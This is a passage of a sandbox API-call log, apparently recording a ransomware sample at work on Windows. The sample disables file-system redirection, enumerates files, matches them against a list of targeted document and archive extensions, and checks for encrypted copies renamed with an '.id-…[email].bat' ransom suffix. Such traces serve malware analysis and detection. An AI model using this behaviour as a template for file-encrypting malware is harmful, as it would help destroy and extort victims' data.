0x102 [0196.115] GetTickCount () returned 0x1c771 [0196.115] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0196.532] GetTickCount () returned 0x1c908 [0196.532] GetTickCount () returned 0x1c908 [0196.532] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0196.669] GetTickCount () returned 0x1c994 [0196.670] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0196.781] GetTickCount () returned 0x1ca02 [0196.782] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0197.182] GetTickCount () returned 0x1cb98 [0197.182] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0197.596] GetTickCount () returned 0x1cd2e [0197.596] GetTickCount () returned 0x1cd2e [0197.596] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0198.070] GetTickCount () returned 0x1cf12 [0198.070] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0198.585] GetTickCount () returned 0x1d116 [0198.586] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0198.822] GetTickCount () returned 0x1d200 [0198.822] GetTickCount () returned 0x1d200 [0198.822] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0198.959] GetTickCount () returned 0x1d28d [0198.959] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0199.218] GetTickCount () returned 0x1d387 [0199.218] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0199.482] GetTickCount () returned 0x1d491 [0199.482] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0199.590] GetTickCount () returned 0x1d4fe [0199.590] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0200.188] GetTickCount () returned 0x1d75f [0200.188] GetTickCount () returned 0x1d75f [0200.188] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0200.519] GetTickCount () returned 0x1d8a8 [0200.519] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0200.709] GetTickCount () returned 0x1d963 [0200.709] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0201.774] GetTickCount () returned 0x1dd8a [0201.774] GetTickCount () returned 0x1dd8a [0201.774] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) returned 0x102 [0202.118] GetTickCount () returned 0x1def1 [0202.118] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x64) Thread: id = 87 os_tid = 0x638 [0177.946] GetTickCount () returned 0x18075 [0177.946] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x6e46a0 [0177.946] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6e46a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2dc [0177.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6e46a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2e0 [0177.948] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6e46a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2e4 [0177.948] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6e46a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2e8 [0177.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddbc8 [0177.949] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddbc8, Size=0x20) returned 0x6bee80 [0177.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddbc8 [0177.949] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddbc8, Size=0x20) returned 0x6bef48 [0177.949] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0177.949] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0177.949] Wow64DisableWow64FsRedirection (in: OldValue=0x295ff7c | out: OldValue=0x295ff7c*=0x0) returned 1 [0177.949] lstrlenW (lpString="kernel32.dll") returned 12 [0177.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bee80 | out: hHeap=0x680000) returned 1 [0177.949] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0177.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x680000) returned 1 [0177.949] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x6eafd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2ec [0177.950] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0178.190] GetTickCount () returned 0x1816f [0178.190] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0178.456] GetTickCount () returned 0x18279 [0178.456] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0178.844] GetTickCount () returned 0x183f0 [0178.844] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0179.406] GetTickCount () returned 0x18623 [0179.406] GetTickCount () returned 0x18623 [0179.406] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0179.694] GetTickCount () returned 0x1874b [0179.694] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0179.996] GetTickCount () returned 0x18874 [0179.996] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0181.561] GetTickCount () returned 0x18e9e [0181.561] GetTickCount () returned 0x18e9e [0181.561] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0182.361] GetTickCount () returned 0x191bb [0182.361] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0182.785] GetTickCount () returned 0x19361 [0182.785] GetTickCount () returned 0x19361 [0182.785] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0183.263] GetTickCount () returned 0x19536 [0183.263] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0184.256] GetTickCount () returned 0x1991e [0184.257] GetTickCount () returned 0x1991e [0184.257] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0184.682] GetTickCount () returned 0x19ac4 [0184.682] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0185.110] GetTickCount () returned 0x19c79 [0185.110] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0185.408] GetTickCount () returned 0x19da2 [0185.408] GetTickCount () returned 0x19da2 [0185.408] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0185.594] GetTickCount () returned 0x19e5e [0185.594] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0185.720] GetTickCount () returned 0x19edb [0185.720] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0185.887] GetTickCount () returned 0x19f87 [0185.887] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0186.078] GetTickCount () returned 0x1a042 [0186.078] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0186.466] GetTickCount () returned 0x1a1c9 [0186.466] GetTickCount () returned 0x1a1c9 [0186.466] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0186.673] GetTickCount () returned 0x1a294 [0186.673] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0186.859] GetTickCount () returned 0x1a34f [0186.859] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0186.995] GetTickCount () returned 0x1a3cc [0186.995] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0187.136] GetTickCount () returned 0x1a459 [0187.136] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0187.280] GetTickCount () returned 0x1a4f5 [0187.280] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0187.399] GetTickCount () returned 0x1a563 [0187.399] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0187.512] GetTickCount () returned 0x1a5d0 [0187.512] GetTickCount () returned 0x1a5d0 [0187.512] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0187.609] GetTickCount () returned 0x1a63d [0187.609] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0187.721] GetTickCount () returned 0x1a6ab [0187.721] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0187.828] GetTickCount () returned 0x1a718 [0187.828] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0187.946] GetTickCount () returned 0x1a785 [0187.946] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0188.236] GetTickCount () returned 0x1a8ae [0188.236] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0188.343] GetTickCount () returned 0x1a91c [0188.343] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0188.490] GetTickCount () returned 0x1a9a8 [0188.490] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0188.593] GetTickCount () returned 0x1aa16 [0188.593] GetTickCount () returned 0x1aa16 [0188.593] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0188.734] GetTickCount () returned 0x1aaa2 [0188.734] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0188.846] GetTickCount () returned 0x1ab10 [0188.846] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0188.952] GetTickCount () returned 0x1ab7d [0188.952] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0189.062] GetTickCount () returned 0x1abea [0189.062] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0189.171] GetTickCount () returned 0x1ac58 [0189.171] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0189.281] GetTickCount () returned 0x1acc5 [0189.281] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0189.390] GetTickCount () returned 0x1ad33 [0189.390] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0189.517] GetTickCount () returned 0x1adb0 [0189.517] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0189.624] GetTickCount () returned 0x1ae1d [0189.624] GetTickCount () returned 0x1ae1d [0189.624] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0189.734] GetTickCount () returned 0x1ae8a [0189.734] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0189.843] GetTickCount () returned 0x1aef8 [0189.843] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0189.961] GetTickCount () returned 0x1af65 [0189.961] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0190.063] GetTickCount () returned 0x1afd2 [0190.063] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0190.184] GetTickCount () returned 0x1b040 [0190.184] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0190.282] GetTickCount () returned 0x1b0ad [0190.282] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0190.391] GetTickCount () returned 0x1b11b [0190.391] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0190.501] GetTickCount () returned 0x1b188 [0190.501] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0190.610] GetTickCount () returned 0x1b1f5 [0190.610] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0190.782] GetTickCount () returned 0x1b2a1 [0190.782] GetTickCount () returned 0x1b2a1 [0190.782] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0190.916] GetTickCount () returned 0x1b31e [0190.916] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0191.016] GetTickCount () returned 0x1b38c [0191.016] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0191.226] GetTickCount () returned 0x1b457 [0191.226] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0191.346] GetTickCount () returned 0x1b4d4 [0191.346] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0191.454] GetTickCount () returned 0x1b541 [0191.454] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0191.563] GetTickCount () returned 0x1b5ae [0191.563] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0191.672] GetTickCount () returned 0x1b61c [0191.672] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0191.782] GetTickCount () returned 0x1b689 [0191.782] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0191.906] GetTickCount () returned 0x1b6f7 [0191.906] GetTickCount () returned 0x1b6f7 [0191.906] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0192.016] GetTickCount () returned 0x1b774 [0192.016] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0194.454] GetTickCount () returned 0x1c0f9 [0194.454] GetTickCount () returned 0x1c0f9 [0194.454] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0194.596] GetTickCount () returned 0x1c186 [0194.596] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0194.704] GetTickCount () returned 0x1c1f3 [0194.704] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0194.813] GetTickCount () returned 0x1c260 [0194.813] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0194.923] GetTickCount () returned 0x1c2ce [0194.923] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0195.054] GetTickCount () returned 0x1c34b [0195.054] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0195.163] GetTickCount () returned 0x1c3b8 [0195.163] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0195.272] GetTickCount () returned 0x1c426 [0195.272] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0195.397] GetTickCount () returned 0x1c4a3 [0195.397] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0195.515] GetTickCount () returned 0x1c510 [0195.515] GetTickCount () returned 0x1c510 [0195.515] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0195.617] GetTickCount () returned 0x1c57d [0195.617] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0195.887] GetTickCount () returned 0x1c687 [0195.887] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0195.982] GetTickCount () returned 0x1c6f4 [0195.982] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0196.115] GetTickCount () returned 0x1c771 [0196.115] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0196.532] GetTickCount () returned 0x1c908 [0196.532] GetTickCount () returned 0x1c908 [0196.532] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0196.670] GetTickCount () returned 0x1c994 [0196.670] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0196.781] GetTickCount () returned 0x1ca02 [0196.781] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0197.182] GetTickCount () returned 0x1cb98 [0197.182] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0197.595] GetTickCount () returned 0x1cd2e [0197.595] GetTickCount () returned 0x1cd2e [0197.595] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0198.070] GetTickCount () returned 0x1cf12 [0198.070] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0198.585] GetTickCount () returned 0x1d116 [0198.585] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0198.822] GetTickCount () returned 0x1d200 [0198.822] GetTickCount () returned 0x1d200 [0198.822] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0198.959] GetTickCount () returned 0x1d28d [0198.959] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0199.218] GetTickCount () returned 0x1d387 [0199.218] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0199.482] GetTickCount () returned 0x1d491 [0199.482] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0199.590] GetTickCount () returned 0x1d4fe [0199.590] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0200.188] GetTickCount () returned 0x1d75f [0200.188] GetTickCount () returned 0x1d75f [0200.188] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0200.519] GetTickCount () returned 0x1d8a8 [0200.519] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0200.709] GetTickCount () returned 0x1d963 [0200.709] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0201.774] GetTickCount () returned 0x1dd8a [0201.774] GetTickCount () returned 0x1dd8a [0201.774] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) returned 0x102 [0202.118] GetTickCount () returned 0x1def1 [0202.118] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x64) Thread: id = 89 os_tid = 0xc84 [0178.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x71dc20 [0178.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x72dc28 [0178.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddbf8 [0178.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x70c290 [0178.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddc10 [0178.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100000) returned 0x39f4020 [0178.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddc58 [0178.024] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddc58, Size=0x20) returned 0x6beea8 [0178.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddc58 [0178.024] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddc58, Size=0x20) returned 0x6bef48 [0178.024] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.025] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.025] Wow64DisableWow64FsRedirection (in: OldValue=0x2e9ff50 | out: OldValue=0x2e9ff50*=0x0) returned 1 [0178.025] lstrlenW (lpString="kernel32.dll") returned 12 [0178.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beea8 | out: hHeap=0x680000) returned 1 [0178.025] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x680000) returned 1 [0178.025] Sleep (dwMilliseconds=0x64) [0178.262] lstrcmpiW (lpString1=".ini", lpString2=".bat") returned 1 [0178.263] lstrlenW (lpString="desktop.ini") returned 11 [0178.263] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0178.263] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=129) returned 1 [0178.263] CloseHandle (hObject=0x304) returned 1 [0178.263] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 0x26 [0178.263] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0x26 [0178.263] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.263] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.263] lstrlenW (lpString=".doc") returned 4 [0178.263] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0178.264] lstrlenW (lpString=".docx") returned 5 [0178.264] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0178.264] lstrlenW (lpString=".pdf") returned 4 [0178.264] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0178.264] lstrlenW (lpString=".xls") returned 4 [0178.264] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0178.264] lstrlenW (lpString=".xlsx") returned 5 [0178.264] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0178.264] lstrlenW (lpString=".ppt") returned 4 [0178.264] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0178.264] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.264] lstrlenW (lpString=".zip") returned 4 [0178.264] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0178.264] lstrlenW (lpString=".rar") returned 4 [0178.264] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0178.264] lstrlenW (lpString=".bz2") returned 4 [0178.264] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0178.264] lstrlenW (lpString=".7z") returned 3 [0178.264] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0178.264] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.264] lstrlenW (lpString=".dbf") returned 4 [0178.264] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0178.264] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.264] lstrlenW (lpString=".1cd") returned 4 [0178.264] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0178.264] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.264] lstrlenW (lpString=".jpg") returned 4 [0178.264] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0178.265] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.265] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.265] lstrlenW (lpString=".doc") returned 4 [0178.265] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0178.265] lstrlenW (lpString=".docx") returned 5 [0178.265] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0178.265] lstrlenW (lpString=".pdf") returned 4 [0178.265] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0178.265] lstrlenW (lpString=".xls") returned 4 [0178.265] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0178.265] lstrlenW (lpString=".xlsx") returned 5 [0178.265] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0178.265] lstrlenW (lpString=".ppt") returned 4 [0178.265] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0178.265] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.265] lstrlenW (lpString=".zip") returned 4 [0178.265] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0178.265] lstrlenW (lpString=".rar") returned 4 [0178.265] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0178.265] lstrlenW (lpString=".bz2") returned 4 [0178.265] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0178.265] lstrlenW (lpString=".7z") returned 3 [0178.265] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0178.265] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.265] lstrlenW (lpString=".dbf") returned 4 [0178.265] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0178.265] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.266] lstrlenW (lpString=".1cd") returned 4 [0178.266] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0178.266] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0178.266] lstrlenW (lpString=".jpg") returned 4 [0178.266] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0178.266] Sleep (dwMilliseconds=0x64) [0178.499] Sleep (dwMilliseconds=0x64) [0178.923] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.923] lstrlenW (lpString="Alphabet.xml") returned 12 [0178.923] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0178.923] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=791421) returned 1 [0178.923] CloseHandle (hObject=0x344) returned 1 [0178.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0178.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0178.924] lstrlenW (lpString=".doc") returned 4 [0178.924] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0178.924] lstrlenW (lpString=".docx") returned 5 [0178.925] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0178.925] lstrlenW (lpString=".pdf") returned 4 [0178.925] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0178.925] lstrlenW (lpString=".xls") returned 4 [0178.925] 